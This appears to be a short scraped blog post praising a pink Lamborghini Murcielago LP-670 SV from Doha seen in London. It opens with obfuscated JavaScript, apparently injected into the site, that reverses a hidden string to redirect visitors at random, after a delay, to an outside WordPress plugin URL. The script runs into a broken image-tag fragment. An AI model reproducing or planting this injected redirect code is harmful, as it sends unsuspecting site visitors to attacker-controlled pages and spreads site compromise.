$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/press_release/pinkqatarSV.jpg”>
Well the summer vacations have come to an end and the Middle Eastern heavy metal will mostly all have returned to their respective countries. I would hazard a guess that the wealthy central London residents that have been bombarded over the last few months will be more than happy with the tranquility that has descended on their streets, yet apprehensive about what next year brings.
So as a parting fair well to the awesomeness of Supercars on their travels, we give you this stunning shot of the stand out car this year. The Big, Bad, Pink, Lamborghini Murcielago LP-670 SV straight from the streets of Doha, Qatar.
[Murphy Photography]